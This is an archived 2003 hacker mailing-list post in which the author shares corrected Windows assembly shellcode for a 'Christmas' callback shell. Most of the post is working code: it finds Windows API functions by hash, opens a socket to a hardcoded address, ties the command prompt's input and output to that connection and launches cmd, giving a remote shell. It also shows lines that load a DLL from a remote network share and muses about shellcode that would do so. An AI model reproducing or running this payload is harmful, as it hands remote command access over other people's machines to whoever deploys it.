 |
|
|
 Welcome to the Virus.Org Mailing List Archive |
||
 |
||
|
||
|
I got sick of concentrating, "QUOTE" -----Original Message----- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Brett Moore Sent: Tuesday, December 09, 2003 6:14 PM To: [EMAIL PROTECTED] Org Subject: [DARKLAB] Jingle Bells, Christmas Shells I got sick of optimising, Enjoy. Brett ;************************ Christmas Shells********************************* ; Callback Shell. ; Directly set std handles and call system() ; ; 200 (C8h) bytes 0xetc "END QUOTE" Yeah... well you should've really tested the code some more.... Yup its christmas eve, well its ticked over to christmas day here, and in the general spirit of raising glasses; I have done so... BUT i have a theory. A) nobody noticed, b) nobody knew c) nobody tested it d) all of the above. Anyway to the guts of the problem. The code I posted worked fine in the example, worked sweet against 'console' apps, but when I tried it against a gui or 'non-console' app it really didn't like it.. So sorry for the confusion, its now been amended. So a call to AllocConsole() has been added. MSDN notes ---------------------------------------------------- The AllocConsole function allocates a new console for the calling process. BOOL AllocConsole(VOID) Parameters This function has no parameters. Return Values If the function succeeds, the return value is nonzero. If the function fails, the return value is zero. To get extended error information, call GetLastError. Remarks A process can be associated with only one console, so the AllocConsole function fails if the calling process already has a console. A process can use the FreeConsole function to detach itself from its current console, and then it can call AllocConsole to create a new console. If the calling process creates a child process, the child inherits the new console. AllocConsole also sets up standard input, standard output, and standard error handles for the new console. The standard input handle is a handle to the console's input buffer, and the standard output and standard error handles are handles to the console's screen buffer. To retrieve these handles, use the GetStdHandle function. This function is primarily used by graphics applications to create a console window. Graphics applications are initialized without a console. Console applications are normally initialized with a console, unless they are created as detached processes (by calling the CreateProcess function with the DETACHED_PROCESS flag). ---------------------------------------------------- Which is all cool, but it creates a 'console' window on the server when running the shell.. Perhaps CreateProcess with the detached flag is the way to go. PEB->ProcessParameters? So the new code + more to follow... ;*********************************** Christmas Shells *************************************** ; Callback Shell. ; Directly set std handles and call system() ; ; 205 (CDh) bytes ; ; its not code, its antic0de ; and it works now too %-) ; Left it in tasm format. ; tasm32 -ml /m5 shell.asm ; tlink32 -Tpe -c -x shell.obj ,,, import32 ; ;*********************************** Christmas Shells *************************************** ; Jimminy jellicas its been jimplemented. ; Oddity,Dsp,Shammah,Santa Claus and the rest of the loco locals ; All the o/s peeps who know whats what. ;*************************************************************************** ***************** .586p locals .model flat, stdcall extrn ExitProcess:PROC extrn WSAStartup:PROC extrn WSACleanup:PROC .data wsadescription_len equ 256 wsasys_status_len equ 128 WSAdata struct wVersion dw ? wHighVersion dw ? szDescription db wsadescription_len+1 dup (?) szSystemStatus db wsasys_status_len+1 dup (?) iMaxSockets dw ? iMaxUdpDg dw ? lpVendorInfo dw ? WSAdata ends wsadata WSAdata <?> .code ;*************************************************************************** * ; Winsock + copy to stack code ;*************************************************************************** * start: ; Winsock start up push offset wsadata push 0101h call WSAStartup or eax, eax jz winsock_found jmp codeend winsock_found: ; copy ourselves onto stack mov ebx,offset realstart sub esp,400h mov eax,esp Copyit: mov cl,byte ptr [ebx] mov byte ptr [eax],cl inc eax inc ebx cmp ebx,offset codeend jle Copyit jmp esp ;*************************************************************************** * ; This is the start of the shell code ;*************************************************************************** * realstart: jmp over_data ; 8 bytes of socket sockdat db 02h,01h,07h,0d0h ; 0201,port (2000) db 0c0h,0a8h,01h,3fh ; IP address 192.168.1.63 ; 25 bytes of data hashes db 01h ; Termination dw 364Ah ; System msvcrt.dll db "MSVCRT",01 dw 422Ah ; WSASocket ws2_32.dll dw 8AD4h ; Connect ws2_32.dll db "WS2_32",01 dw 817Ch ; AllocConsole kernel32.dll dw 4E2Ch ; LoadLibrary kernel32.dll over_data: ; 7 byte Getself code push 0ACC3575Fh ; Pop/Push/Ret call esp ; EIP returned in EDI ; EDI - 7 points to end of hashes ; find Kernel32 base + store peb address mov esi,7ffdf00ch ; Offset into PEB lodsd ; PPROCESS_MODULE_INFO push dword ptr [esi] ; Store PEB->ProcessParameters->base address for later mov esi,[eax + 1ch] ; InInitializationOrderModuleList lodsd ; Grab Next Pointer (Kernel32.dll) in eax mov edx,[eax + 08h] ; EDX = kernel32.dll base address push -8 ; EDI Adjuster for later loadlibrary calls lea ebx,[edi-8] ; EBX Holds address of hashes LookupFunctions: push esp ; Reset the stack base pointer pop ebp ; So we can use EBP, and store current stack pos ; get RVA tables mov ecx,dword ptr [edx + 3ch] ; Get NT Header Offset Address. Base + 3ch mov esi,dword ptr [ecx + edx + 78h] ; Add Base And Move To Data Dictionary lea esi,dword ptr [esi + edx + 1ch] ; Add Base And Move To The Tables mov cl,3 ; 3 Loops, ECX was holding the NT Header offset 0x00d0 or similiar StoreAddress: ; Store address's lodsd ; EAX = Address Table / Name Ptrz / Ordinal RVA add eax,edx ; Add Base Location push eax ; Store it on stack loop short StoreAddress ; Loopy ;************************************************************************* ; [EDI-7] = end of hashes ; EDI = start of Function address storage location ; EDX = dll base address ; EBX = address of hashes +1 (offset for loadlib implementation) ;************************************************************************* SearchStart: dec ebx ; Dec our EBX pointer to the hashes. mov esi,dword ptr [ebp - 8] ; Get Name Ptrz Table xor eax,eax ; Set Our API Counter To 0 push eax ; Push a 0 for later Search: push eax ; Store our API counter lodsd ; Load address of function name from [ESI] into EAX add eax,edx ; Add DLL base address xor ecx,ecx ; Zero our hash value counter hashy: add cx,word ptr [eax] ; Add it up add cl,byte ptr [eax] ; Add it up inc eax ; Move along cmp byte ptr [eax],01 ; End of string jge hashy ; Nup pop eax ; Restore Our API Counter inc eax ; Inc our API counter cmp cx,[ebx] ; Compare To Hash Value jne Search ; We go and check the next name if they don't match ; GotMatch pop esi ; Pop a 0 xchg esi,eax ; Get Our API Counter Into ESI, 0 into EAX dec esi ; Adjust our API counter back 1 shl esi,1 ; ESI = ESI * 2 add esi,dword ptr [ebp - 0ch] ; Normalize With Ordinal VA lodsw ; Get Ordinal in AX Word Only shl eax,2 ; EAX = AX * 4 add eax,dword ptr [ebp - 4h] ; Normalize With Address VA xchg esi,eax ; Swap them around lodsd ; Load Function address into EAX add eax,edx ; Normalize with the base and all is done. stosd ; Store the function location in [EDI] ; We sub 1 here, 1 up at SearchStart. Strange loadlib implementation dec ebx ; To move to next hash. No byte loss cmp byte ptr [ebx],01h ; Hash dll seperator jne short SearchStart ; Go and find another API ; Requires a loadlibrary call leave ; Adjust stack back, pops EDI adjuster in EBP dec byte ptr [ebx] ; Create a null terminator sub ebx,06h ; Move down hash table cmp byte ptr [ebx],07h ; Past our hashes? je short Done_Finding ; Done push ebx ; Push address of dll call dword ptr [edi + ebp] ; Call LoadLibrary xchg edx,eax ; Save base Address push -16 ; Store EDI Adjuster dec ebx ; We sub 1 here, 1 up at SearchStart. Strange loadlib implementation jne short LookupFunctions ; Load the next DLLS functions Done_Finding: ;***************************************** ; [EDI - 04h] System ; [EDI - 08h] WSASocket ; [EDI - 0ch] Connect ; [EDI - 10h] AllocConsole ; [EDI - 14h] LoadLibrary ;***************************************** xchg eax,ebp ; Store the system() address ; Create console call [EDI - 10h] ; Call AllocConsole() xor ecx,ecx ; Null ECX ; call WSASocket push ecx ; Push 0 push ecx ; Push 0 push ecx ; Push 0 push ecx ; Push 0 inc ecx ; Increment ecx push ecx ; Push 1 inc ecx ; Increment ecx push ecx ; Push 2 call [EDI - 08h] ; Call WSASocket xchg ecx,edi ; Store API storage ; Directly edit the standard handles pop edi ; Pop PEB->ProcessParameters->base address add edi,18h ; And adjust stosd ; Set handle stosd ; Set handle stosd ; Set handle ; Setup socket data dec ebx ; Need to dec byte ptr [ebx] ; Remove 01 dec ebx ; And position ; call connect push ebx ; Push the name structure length. Doesn't seem to matter. std is 10h push ebx ; Push location of structure push eax ; Push socket call [ecx - 0ch] ; Call Connect ; Call system() push 20646D63h ; Push cmd on stack, null exists from above push esp ; Location to cmd call ebp ; Call system() nop call WSACleanup codeend: end start ---------EOF Yup so merry times to you all, sorry about the formatting... Today is family christmas day for me. Then no PC for an undertermined amount of time... So I hope you all enjoy your times,,, hMod = LoadLibrary("\\\\IP\\share\\exploit.dll"); ~ rundll32 \\IP\share\user32.dll,MessageBoxA asdad I figure a shell could be created that found loadlib and then loaded the remote dll.. Only work locally/intranet type range with sharing enabled... But could be kinda cool... Sorry for the muckup on the first shellcode post, merry holiday times.. Cyua ?? Brett - The DarkLab.org mailing list. http://www.darklab.org
|
All Trademarks Acknowledged.
Please view our Terms and Conditions and our Privacy Policy.